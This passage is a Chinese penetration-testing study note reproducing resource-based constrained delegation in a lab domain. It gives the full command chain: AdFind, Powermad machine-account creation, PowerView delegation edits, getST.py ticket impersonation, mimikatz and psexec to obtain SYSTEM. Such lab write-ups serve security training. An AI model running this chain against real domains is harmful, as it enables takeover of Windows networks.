第136天:内网安全-横向移动&资源约束委派

xiaojiesec2024-08-27 17:03

利用条件

首先是dc域控主机必须是win2012以上的主机

其次是域内有一个账户,可以同时登录两台主机

利用 jie 可以登录 win2008 也可以登录 win7

资源委派不需要设置委派,默认即可

实验复现

复现环境

通过网盘分享的文件:136-xiaodi.local内网域环境镜像文件

链接: https://pan.baidu.com/s/1H3ypkEoTiJMbwfMxJ7JMCA?pwd=wnra 提取码: wnra

这里在本地复现,cs中操作时一致的

使用adfind工具查询域内是否有SID一致的主机,并获取主机名

复制代码 
AdFind.exe -h DC的ip -b "DC=域,DC=控" -f "objectClass=computer" mS-DS-CreatorSID
AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

要利用资源委派就得知道这个用户是谁,根据这个sid,利用工具sid2user.exe去查询用户名,需要删除sid的s-1以及后面的所有横杠

复制代码 
sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

那么如果你拿到的就是dbadmin用户,就可以利用该账户从web渗透到dc,没拿到就得想办法去获取这个用户

利用这个工具去执行下面的攻击

https://gitcode.com/gh_mirrors/po/Powermad/overview?utm_source=csdn_github_accelerator&isLogin=1

添加机器

Set-ExecutionPolicy Bypass -Scope Process ##设置允许执行脚本

import-module .\Powermad.ps1 ##导入模块

New-MachineAccount -MachineAccount test1 -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force) ##创建一个用户为test1的,然后密码是123456

执行完成以后域控内有一个test1主机

获取新主机的sid值

Set-ExecutionPolicy Bypass -Scope Process

Import-Module .\PowerView.ps1

Get-NetComputer test1 -Properties objectsid

修改目标主机的属性

Set-ExecutionPolicy Bypass -Scope Process

import-module .\powerview.ps1

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1602)" ##(刚才获得的sid值)

SDBytes = New-Object byte\[\] (SD.BinaryLength)

SD.GetBinaryForm(SDBytes, 0)

Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose ##(DATA是攻击的目标主机)

检验是否配置成功

复制代码 
Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

这个时候就可以生成票据去执行后续操作了,由于需要用到python程序,所以这里我还是用cs上线生成sockets代理

利用impack套件里面的getst.py获得票据,这里生成票据的时候不管你是再本地还是在代理都要记得设置hosts文件,否则无效

复制代码 
proxychains4 python getST.py -dc-ip 192.168.3.33 xiaodi.local/test1\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

生成了一个票据,上传到服务器,利用mimikatz导入票据

复制代码 
mimikatz kerberos::ptc administrator.ccache

再访问

提升权限

复制代码 
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass   ##可提升为system权限。
相关推荐
Boxsc_midnight13 小时前
【windows电脑浏览器直接访问虚拟机或云端openclaw的方法】一个不需要HTTPS的安全连接通道(基于SSH)
windows·安全·https·openclaw
安全二次方security²13 小时前
【CVE-2025-0647】ARM CPU漏洞安全通告
arm开发·安全·cve-2025-0647·tlbi·cpp rctx 指令·c1-ultra·虚拟化漏洞
●VON14 小时前
HarmonyOS应用开发实战(基础篇)Day11 -《组件复用》
学习·安全·华为·harmonyos·von
德迅云安全-小潘1 天前
德迅零域(微隔离):破解云时代横向渗透困局的“手术刀”
网络·数据库·安全
良许Linux1 天前
物联网安全和认证技术
物联网·struts·安全
AI题库1 天前
PostgreSQL 18 默认密码修改全指南:从安装到安全加固
数据库·安全·postgresql
猫头虎1 天前
[精选] 2025最新MySQL和PostgreSQL区别、迁移、安全、适用场景全解析
运维·数据库·mysql·安全·postgresql·云原生·容器
枷锁—sha1 天前
【CTFshow-pwn系列】03_栈溢出【pwn 051】详解:C++字符串替换引发的血案与 Ret2Text
开发语言·网络·c++·笔记·安全·网络安全
菩提小狗1 天前
第18天:信息打点-APP资产&知识产权&应用监控&静态提取&动态抓包&动态调试_笔记|小迪安全2023-2024|web安全|渗透测试|
笔记·安全·web安全
johnny2331 天前
渗透测试入门:Shannon、SpiderSuite、Payloader
安全
热门推荐
01GitHub 镜像站点02AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot03Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services04Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤05【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆06配置 OpenClaw 使用 Ollama 本地模型07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南09OpenClaw 安装之(三)DeepSeek模型接入配置和详细配置参数10HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库